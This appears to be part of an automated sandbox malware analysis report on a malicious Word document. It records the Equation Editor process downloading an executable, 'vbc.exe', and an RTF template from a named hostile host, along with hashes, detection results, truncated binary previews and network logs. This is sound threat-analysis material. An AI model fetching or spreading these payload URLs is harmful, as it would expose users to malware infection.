Preview:	......M.eFy...z...KzfL........S,...X.F...Fa.q.................................&rG..3.g..........w..@j..D...G.Hl(....................................................................t...t...t...t............................................................................................................................................................................................................................................................................................................................N....C..["..H........w..@j..D...G.Hl(................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	133
Entropy (8bit):	4.27737057069014
Encrypted:	false
SSDEEP:	3:yVlgQPDRlgsRlz2HkUkOlYiZTlFnI9WWlTFaJsYt276:yPdPDDblz2E9OlYiZcLeHt22
MD5:	2688B8B652C08EF2E59DC5477466D6B2
SHA1:	A3923AC39EE421EDC6571FAA262E12115B47D740
SHA-256:	F39A5CA0BBFAA370A914D8F431B879E85A4635E5D4073F9C29FEE87663C7817E
SHA-512:	C8134EBEFA369F921A15CFC50D97B9DBCD41338DD1108FED935F589B5904BB9472B82ED9F96559AB2E3BC83EBF7E71B9AB1C4C9B5F9E19D0064110A8F9751341
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q.....H..@....b..q....]F.S.D.-.{.4.5.D.4.3.9.A.1.-.3.5.3.7.-.4.B.8.8.-.B.E.4.1.-.8.3.6.C.E.F.2.5.E.8.1.A.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	1141760
Entropy (8bit):	7.956232639570589
Encrypted:	false
SSDEEP:	24576:jVdIEYuS48YvtC/X4kRxlhtJftkKrEMAtugu+/a:jEjX48uAzJEMZry
MD5:	042AA11C6D49E1CCA5923F02D1B0A5AE
SHA1:	5A89FF2F9702A53FB638B8C7229BA868AAA58AE9
SHA-256:	3383218B916BAF1A46989C4F253B29EB81E97AC763AB71615C81D85A18495F34
SHA-512:	6D0551584F1F4C5391012111BE3BC251026D3DB6A531AB7A8CE0D41CF278A254BC8A0BC66690A1A93C3BF52C2C1C70E7FCD94E4B8812BCEA95EFA8BDA86D7184
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 23%
Joe Sandbox View:	Filename: Original title deed.xlsx, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	http://nta.hopto.org/reg/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..X...........w... ........@.. ....................................@.................................@w..O.................................................................................... ............... ..H............text....W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............j..............@..B................tw......H...........<...........@....Z...........................................0............( ...(!.........(.....o".........................(#......($......(%......(&......('....N..(....o`...((....&..().....s........s+........s,........s-........s.............0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0...........~....o2....+...0...........~....o3....+...0..<........~.....(4.....,!r...p.....(5...o6...s7............~.....+...0......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\v[1].doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	downloaded
Size (bytes):	13225
Entropy (8bit):	5.452930956560603
Encrypted:	false
SSDEEP:	192:Q14baV+TvMFKJkeAXgVu8BctTAf4AE6IZslpaia9wbcP2mTCjT1h/vHlJOltZuqU:ZrMhkYAf7ENPqceCW7HiXEqBzIQStV
MD5:	575B1CF04AF23750CBECBA6B13207E87
SHA1:	FF813B69C01C8830E0482E5F899DEC4B000EED1D
SHA-256:	DC0BB9DEAC66421482D7FBD2323276B328FD4561BFC72E36DCF94134A14B3900
SHA-512:	7793DC8A009F3782BE6D9FEC9B8E68E823BFFF9171274E45AD0FC11FC54BBC3E321A22DFF5020CD307FBBE0604867D1C719D8EFCD7012DB3EAF84D3915497B7B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
IE Cache URL:	http://nta.hopto.org/reg/v.dot
Preview:	{\rt;^?.+24???3@\|.]>#]$7^%#<7+<~2^>?.~9(.???7&);??/_8'3,.3``?%::.\|.0%5~2[?^?91?.].=&$-#.:[.==:,~^9?([]`$1<,6!<&=@.'.__08?._^/.?~.6;.??%-5<?-?5,.73+&?%%[.%2.'\|.?:`?@.&%7#?.'?>.&1.=?//0%(!=];5$?(?06~[4=_$;=0[.$!.?>`\|_0;<,8?48<?20@,94\|[4/.:7.??!<%%>%16[.;.+.`#5^,3.8[\|,[?<@:7'??[7?@4.,~?\|/,.9?.?3-@$1?&~)&>6-]-\|?#48?.3]<=53=/.7.)::3.36~/.+2?!14`0__<&?:+~(.2.@5,!>&%~0+?~._'9+_8:#1???~\|'^-:9!#+.2=?7@!45>;].%7(-.![.936?.%~.+'!_?@~;4?.!%_.,@(%3-&.56.%=9.,?[_'_?@?\|8+:7-(,_<;#+&0]4_?.>3.#-95:2=$?;;605##=3?.?&>,;01.@4`]'=[%0'?,?~,.%#%`*)2-)?>.???@~=:2>._.&:@.%...7=.,)?1).`??2>81!^2+5/'%+=<._;\|'21%`%59%./3?.+,]+=,~??32%%`'2!]][<?%.??.'.(?9:%[=6.:(>?.@:_>&.3.#&`?\|]>!<?3.6%<(?_~1,./,//'5+@!`&-.!=!2!#^;>37@-.;.!?)0;^;\|0):85!?:\|$?~]#?4_.`$^.)4?&=0]??,%.?.<~6\|8>;:+=>?)+22.]%/>?22\|!<)6`:]?(?_%>32!_.[,,<-&.?~7<0&&]?%&^0.2!%>7+??:,%?$.[&][?<+%_-?3&%4<7?/'%.#)-$(?94~$[\|_&$$584,[+.7?[&709[`????(%,?<?4`7\|'.@35-[?`^3[0?!:2=&?%#])?!?6%?9?+?]7(](#)6:?)/6.3:='/?7.<4;4~1_%3?&4.])`[$+?.+~?7@

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B75759.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	13225
Entropy (8bit):	5.452930956560603
Encrypted:	false
SSDEEP:	192:Q14baV+TvMFKJkeAXgVu8BctTAf4AE6IZslpaia9wbcP2mTCjT1h/vHlJOltZuqU:ZrMhkYAf7ENPqceCW7HiXEqBzIQStV
MD5:	575B1CF04AF23750CBECBA6B13207E87
SHA1:	FF813B69C01C8830E0482E5F899DEC4B000EED1D
SHA-256:	DC0BB9DEAC66421482D7FBD2323276B328FD4561BFC72E36DCF94134A14B3900
SHA-512:	7793DC8A009F3782BE6D9FEC9B8E68E823BFFF9171274E45AD0FC11FC54BBC3E321A22DFF5020CD307FBBE0604867D1C719D8EFCD7012DB3EAF84D3915497B7B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rt;^?.+24???3@\|.]>#]$7^%#<7+<~2^>?.~9(.???7&);??/_8'3,.3``?%::.\|.0%5~2[?^?91?.].=&$-#.:[.==:,~^9?([]`$1<,6!<&=@.'.__08?._^/.?~.6;.??%-5<?-?5,.73+&?%%[.%2.'\|.?:`?@.&%7#?.'?>.&1.=?//0%(!=];5$?(?06~[4=_$;=0[.$!.?>`\|_0;<,8?48<?20@,94\|[4/.:7.??!<%%>%16[.;.+.`#5^,3.8[\|,[?<@:7'??[7?@4.,~?\|/,.9?.?3-@$1?&~)&>6-]-\|?#48?.3]<=53=/.7.)::3.36~/.+2?!14`0__<&?:+~(.2.@5,!>&%~0+?~._'9+_8:#1???~\|'^-:9!#+.2=?7@!45>;].%7(-.![.936?.%~.+'!_?@~;4?.!%_.,@(%3-&.56.%=9.,?[_'_?@?\|8+:7-(,_<;#+&0]4_?.>3.#-95:2=$?;;605##=3?.?&>,;01.@4`]'=[%0'?,?~,.%#%`*)2-)?>.???@~=:2>._.&:@.%...7=.,)?1).`??2>81!^2+5/'%+=<._;\|'21%`%59%./3?.+,]+=,~??32%%`'2!]][<?%.??.'.(?9:%[=6.:(>?.@:_>&.3.#&`?\|]>!<?3.6%<(?_~1,./,//'5+@!`&-.!=!2!#^;>37@-.;.!?)0;^;\|0):85!?:\|$?~]#?4_.`$^.)4?&=0]??,%.?.<~6\|8>;:+=>?)+22.]%/>?22\|!<)6`:]?(?_%>32!_.[,,<-&.?~7<0&&]?%&^0.2!%>7+??:,%?$.[&][?<+%_-?3&%4<7?/'%.#)-$(?94~$[\|_&$$584,[+.7?[&709[`????(%,?<?4`7\|'.@35-[?`^3[0?!:2=&?%#])?!?6%?9?+?]7(](#)6:?)/6.3:='/?7.<4;4~1_%3?&4.])`[$+?.+~?7@

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE4CB73-349E-46EF-BF24-C3A751787722}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CA5B12C-492C-4E57-AE2D-0E7798ADDEF4}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	dBase III DBT, version number 0, next free block index 7536653
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.10581667566270775
Encrypted:	false
SSDEEP:	3:Ghl/dlYdn:Gh2n
MD5:	28ADF62789FD86C3D04877B2D607E000
SHA1:	A62F70A7B17863E69759A6720E75FC80E12B46E6
SHA-256:	0877A3FC43A5F341429A26010BA4004162FA051783B31B8DD8056ECA046CF9E2
SHA-512:	15C01B4AD2E173BAF8BF0FAE7455B4284267005E6E5302640AA8056075742E9B8A2004B8EB6200AA68564C40A2596C7600D426619A2AC832C64DB703A7F0360D
Malicious:	false
Preview:	..s.d.f.s.f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DD41239A-D6DE-42E0-947A-6C3BAA1EDCFF}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	3.557735045281649
Encrypted:	false
SSDEEP:	192:H5SMRk1Nkhrqm4negoDvVJm2SSzD9+qHPEHJ2mtKQXNSilge7G1zoGJupTBgZ:H51hrqmIoDvK8JcHomhXNNgj1slgZ
MD5:	8AF8CCF44C545488639D6B18924C02E0
SHA1:	0EA973C0C6D4C9226E4246463EF70BF313468E2B
SHA-256:	14F65D4C9C55A7A4B815E9C348D8C1BCC510846A5E334F2B70979933C08F811F
SHA-512:	D82E7BEFB16F5BFA4B204E48AA74B1EC6034329B8C11F664FCA6BCF71A7DABD327459D3976F631EC54514515F461355A835385E10458D64C9CD8C942151712EB
Malicious:	false
Preview:	;.^.?...+.2.4.?.?.?.3.@.\|...].>.#.].$..7.^.%.#.<.7.+.<.~.2.^.>.?...~.9.(...?.?.?.7.&.).;.?.?./._.8.'.3.,...3.`.`.?.%.:.:...\|...0.%.5.~.2.[.?.^.?.9.1..?...]...=.&.$.-.#...:.[...=.=.:.,.~.^.9.?.(.[.].`.$.1.<.,.6.!.<.&.=.@...'..._._.0.8.?..._.^./...?.~...6.;...?.?.%.-.5.<.?..-.?.5.,...7.3.+.&.?.%.%.[...%.2...'.\|...?.:.`.?.@...&.%.7.#.?...'.?.>...&.1...=.?././.0.%.(.!.=.].;.5.$.?.(.?.0.6.~.[.4.=.._.$.;..=.0.[...$.!...?.>.`.\|._.0.;.<.,.8.?.4.8.<.?.2.0.@.,.9.4.\|.[.4./...:.7...?.?.!.<.%.%.>.%.1.6.[...;...+...`.#.5.^.,.3...8.[.\|.,.[.?.<.@.:.7.'.?.?.[.7.?.@.4...,.~.?.\|./.,...9.?...?.3.-.@.$.1.?.&.~.).&.>.6.-.].-.\|.?.#.4.8.?...3.].<.=.5.3.=./.....7...).:..:.3...3.6.~./...+.2.?.!.1.4.`.0._._.<.&..?.:.+.~.(...2...@.5.,.!.>.&.%.~..0..+.?.~..._.'.9.+.._.8.:.#.1.?.?.?.~.\|.'.^.-.:.9.!.#.+...2.=.?.7.@.!.4.5.>.;.]...%.7.(.-...!.[...9.3.6.?...%.~...+.'.!._.?.@.~.;.4.?...!.%._...,.@.(.%.3.-.&....5.6...%.=.9...,.?.[._.'._.?.@.?..*.\|.8.+.:.7.-.(.,._.<.;.#.+.&.0.].4._.?...>.3...#.-.9.5.:.2.=.$.

C:\Users\user\AppData\Local\Temp\{542180A0-A252-45A6-9AB6-97F222355736} Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	137348
Entropy (8bit):	0.059941551440069796
Encrypted:	false
SSDEEP:	12:I3DPmHJWfpfv8pRBKf91PmHWfuSQapmVt+fG4/7yPmPfRKp:I3bfg+f9UWfuqmn+fFf+
MD5:	380E93F6C29BEBFF01CD80DB70E418A4
SHA1:	482A30B9790670DBAADD972A2627296CDCC65B82
SHA-256:	B8882F4F9F715AC86A2162BDA11DB3D8A9871A81B8469A7135889751ED7EEDF4
SHA-512:	146C80C37FF5DA73CE9B8D4DEDCD3F3C9696DD9CA61A2D45D1EF3800F68F65A6953C50DE771D5DF4E7E6865131B01CCC86056B19AB2852321F8CA74D44DA63C1
Malicious:	false
Preview:	......M.eFy...z.g.[:..D....C.S,...X.F...Fa.q.............................m.b..:M.......<..........v...jI......`.....................................................................t...t...t...t............................................................................................................................................................................................................................................................................................................................Q*...\|G.7.G..............v...jI......`.................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{B4AE6734-762A-4AC3-86CE-9329F6012CCF} Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	137348
Entropy (8bit):	0.05984878672398472
Encrypted:	false
SSDEEP:	12:I3DPXR/oZdxfv8pTdF1PXRam/tRdGSQapildr/7yPXRI//dZKp:I3ZgCTremvYqilh/8
MD5:	AFC3622BECA2FE0A2AA7F2C62C1DEF52
SHA1:	33CA8EA6497BFD6A0C3015740881AA47C2503BFF
SHA-256:	234145B2F7F54D8FAE90D737010C0B4EAFD3E91FCB68F0F40D7A718952DA81E9
SHA-512:	A6995FE231EE8C51FE74F3839A1E93111E412CD0043FAC119C2B47AAC382860C11B45D82026790AC67F3128252D5974DF0E5DAC366E472AC151D8A8B20C28E8E
Malicious:	false
Preview:	......M.eFy...z...n.yvD..(...dMS,...X.F...Fa.q..............................q..%.C...(l............M.ue..O.&.rpAlV....................................................................t...t...t...t..............................................................................................................................................................................................................................................................................................................................P.f.H....S...........M.ue..O.&.rpAlV................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:+8:+8
MD5:	3C66056414B956EA630FDE1C12DCFBD2
SHA1:	B4E4F0F5AEC8EE07036ACFB813E1A0B8EEB7F72C
SHA-256:	0B786969CEB9C17D4EDC7CF7032C511326707CA6679E683FA1842AEA574852BF
SHA-512:	3AA08AFA070BF6E57A1492E84C04B4CC264789415015C07243A444A8D8D7EFF1E10660CE06564332915CB1D88BB9BDC6B7C410DE4D23AF6FAD91EF3319CB0B3B
Malicious:	true
Preview:	....z..H

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\471e3984_by_Libranalysis.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 3 20:30:28 2021, mtime=Mon May 3 20:30:28 2021, atime=Mon May 3 20:30:34 2021, length=10310, window=hide
Category:	dropped
Size (bytes):	2178
Entropy (8bit):	4.565045725124181
Encrypted:	false
SSDEEP:	48:8M/XTFG4LtEjbOECrJNDbOExqQh2M/XTFG4LtEjbOECrJNDbOExqQ/:8M/XJG4xE/FKNfFxqQh2M/XJG4xE/FK3
MD5:	1CEF9E8216A8638A3E1A5F9ACE49F98A
SHA1:	B10F9D22B8556E7802C742421D7C010FCE8D1154
SHA-256:	8ECF37417F12BED619ED7378361092EF2FE97CF278082B46617A5F006DAC4708
SHA-512:	94D744AF18F4A72C85ADDCF2138BFF0D6148E2C2FCFA59264221203F29232358B0DDB03E538FF63349E54C46059143ADE37B295DC5682FECB2E96883E1DBF7A2
Malicious:	false
Preview:	L..................F.... ...J(.c@..J(.c@....#.c@..F(...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......R...Desktop.d......QK.X.R...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.F(...R. .471E39~1.DOC..h......R..R..........................4.7.1.e.3.9.8.4._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop\471e3984_by_Libranalysis.docx.4.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.7.1.e.3.9.8.4._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dbzEXdF.url Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<https://cutt.ly/dbzEXdF>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.660528466520036
Encrypted:	false
SSDEEP:	3:HRAbABGQYm2fVRYKBo9Vy:HRYFVm4tKy
MD5:	747025194AA52665C2C45500B74E1611
SHA1:	1558E5A045CD2C1530D80983C9DA808636EB2827
SHA-256:	503F68E6F8D2165B5FFAF385F002DB02DB9D06B2C6039C8A0820FD4C60BEE6EF
SHA-512:	E26D0E5F77E77E6E9391DE215027A47436AEF889899CD0C310300D9F5DF433A2259BDEB764E564D9A6171A0202824FFA15B588E5AE4AB1F831ED25DD72118D32
Malicious:	false
Preview:	[InternetShortcut]..URL=https://cutt.ly/dbzEXdF..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	155
Entropy (8bit):	5.071796784908957
Encrypted:	false
SSDEEP:	3:ZMjeSDLUQ/IQZxMWZUzcZ6iHUwSLMp6ldcZ6iHUwSLMp6lmxWZUzcZ6iHUwSLMpI:AeSpQQFUzcEi0NtcEi0NRUzcEi0Nf
MD5:	585330FCDE2F132C87F9BF2E09B345D0
SHA1:	F3241572F0E7494342E875E1E4F3C9E4E362BEE2
SHA-256:	E9A333E20FCB0DC1CE6611FB169FB2E323CCD38C18ED62201C289CF7BBCCA0B1
SHA-512:	5ACDC2D0B658F37FD2A9FBD9B8B478E2200BF857CE0A4E270B870D460101B00502BF1C0D20B73106117323F911B936C153E878337D33CA227EC833A980B06D6C
Malicious:	false
Preview:	dbzEXdF.url=0..reg on nta.hopto.org.url=0..[misc]..471e3984_by_Libranalysis.LNK=0..471e3984_by_Libranalysis.LNK=0..[misc]..471e3984_by_Libranalysis.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\reg on nta.hopto.org.url Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://nta.hopto.org/reg/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	51
Entropy (8bit):	4.255471175177566
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/tQ+/JQY:HRYFVm/tQ+GY
MD5:	51BB72BD52DE9E86DA04887D1F82FA0E
SHA1:	D3A134F6C9962A523E1B9079D45C8D5A5EBDABC4
SHA-256:	8E2B7D0E2128AC717104C841807C887B5CC0616B6B5D6B4034C99F0B4A24CD3B
SHA-512:	D58350511AC054D88E46770851EA68A14D5FD88B3CCE1015A89CFAE1782B061662BC199E58744CB2EDF107E6732B8A9DD0CA4DBF7F980C5C283DB51EADAA20FB
Malicious:	false
Preview:	[InternetShortcut]..URL=http://nta.hopto.org/reg/..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyVGlB4fpgOGwOAM2iKGlH/ln:vdsCkWtIyefOT9l
MD5:	A534FC263736945E165D8060158E52C3
SHA1:	880F5FA90765FDEF1D048AC65EB43DFB9BCCD2A3
SHA-256:	BA319ED8CECAF867117605B12372B2C60A346FFD68C52B9519595961541ACF46
SHA-512:	001BDEB7AC3AF6266DEFFD97296896BACDDE99603238624B559674462256263723E2FDA73F1523821276CB64E5C29A276F4FFC84038056942B8EEB26CD37669E
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........k...............k.............P.k..............k.....z.........k.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\KCZ27U86.txt Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	108
Entropy (8bit):	4.313185160125915
Encrypted:	false
SSDEEP:	3:GmM/LDDA0sDADYG6qlBAMVUFGEYKvjNJTdi2fcucHVl6n:XM/3DSADY3ql2MVUnvjDdi2fcT/6
MD5:	847064A4D9A39611AAA2D5BD7DB31A0B
SHA1:	A874B01F4FD3D7C4D10E4868CA600CED814DBD09
SHA-256:	43F0A291D7790AD90739D0A8F26CF4ED855B28BB2F6535162C60F15656B5DA9B
SHA-512:	E015E87E0EB644926077DB97E20FBF19157DDC4816AAD9D301848B8298FEA3C240EAE9E0574A285317049AA2C99B91927BC3DA1C4E72A1CFD42C532140CBFD64
Malicious:	false
IE Cache URL:	cutt.ly/
Preview:	__cfduid.d0aaffe7bd4593dfe8d724cc8a70ed6de1620045044.cutt.ly/.9728.458256896.30889899.2392535320.30883939.*.

C:\Users\user\Desktop\~$1e3984_by_Libranalysis.docx Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyVGlB4fpgOGwOAM2iKGlH/ln:vdsCkWtIyefOT9l
MD5:	A534FC263736945E165D8060158E52C3
SHA1:	880F5FA90765FDEF1D048AC65EB43DFB9BCCD2A3
SHA-256:	BA319ED8CECAF867117605B12372B2C60A346FFD68C52B9519595961541ACF46
SHA-512:	001BDEB7AC3AF6266DEFFD97296896BACDDE99603238624B559674462256263723E2FDA73F1523821276CB64E5C29A276F4FFC84038056942B8EEB26CD37669E
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........k...............k.............P.k..............k.....z.........k.....x...

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1141760
Entropy (8bit):	7.956232639570589
Encrypted:	false
SSDEEP:	24576:jVdIEYuS48YvtC/X4kRxlhtJftkKrEMAtugu+/a:jEjX48uAzJEMZry
MD5:	042AA11C6D49E1CCA5923F02D1B0A5AE
SHA1:	5A89FF2F9702A53FB638B8C7229BA868AAA58AE9
SHA-256:	3383218B916BAF1A46989C4F253B29EB81E97AC763AB71615C81D85A18495F34
SHA-512:	6D0551584F1F4C5391012111BE3BC251026D3DB6A531AB7A8CE0D41CF278A254BC8A0BC66690A1A93C3BF52C2C1C70E7FCD94E4B8812BCEA95EFA8BDA86D7184
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 23%
Joe Sandbox View:	Filename: Original title deed.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..X...........w... ........@.. ....................................@.................................@w..O.................................................................................... ............... ..H............text....W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............j..............@..B................tw......H...........<...........@....Z...........................................0............( ...(!.........(.....o".........................(#......($......(%......(&......('....N..(....o`...((....&..().....s........s+........s,........s-........s.............0...........~....o/....+...0...........~....o0....+...0...........~....o1....+...0...........~....o2....+...0...........~....o3....+...0..<........~.....(4.....,!r...p.....(5...o6...s7............~.....+...0......

Static File Info

General
File type:	Microsoft Word 2007+
Entropy (8bit):	6.904826806283853
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	471e3984_by_Libranalysis.docx
File size:	10310
MD5:	471e39840386d6b9c8e565123a389364
SHA1:	d9050e2115ee03a7c8e0acc87d199ce0b4b7422a
SHA256:	012300706ce75e6e82abdaa865aa8ff684aef99eda98f9094278b8df84e9642c
SHA512:	13b841bab9f2ef3ce9a27854a09682ba8983df16b4551e997359511f19decb94f85b23b3811f742fd99fdb7f2985b8063a6444b6c556e7cbafebf8f4b3f4a1e5
SSDEEP:	96:kHcIMm57P65rBqdmGJa6T/n/jNTBPUXFUXoa0z0rdlJ+G0pu7mnObtxbOA2N:ScIMmtPAXG/b/Qig0rdlJF+ib3b+N
File Content Preview:	PK..........!....7f... .......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/03/21-14:30:49.586380	TCP	1042	WEB-IIS view source via translate header	49169	80	192.168.2.22	172.67.8.238
05/03/21-14:30:49.937703	TCP	1042	WEB-IIS view source via translate header	49170	80	192.168.2.22	172.67.8.238
05/03/21-14:31:04.602496	TCP	3132	WEB-CLIENT PNG large image width download attempt	80	49175	172.245.45.28	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2021 14:30:43.648102045 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:43.689141989 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:43.689460993 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:43.701410055 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:43.742398024 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:43.755625010 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:43.755654097 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:43.755680084 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:43.755709887 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:43.755738020 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:43.755742073 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:43.764833927 CEST	49165	443	192.168.2.22	172.67.8.238
May 3, 2021 14:30:43.805951118 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:43.805973053 CEST	443	49165	172.67.8.238	192.168.2.22
May 3, 2021 14:30:43.806078911 CEST	49165	443	192.168.2.22	172.67.8.238
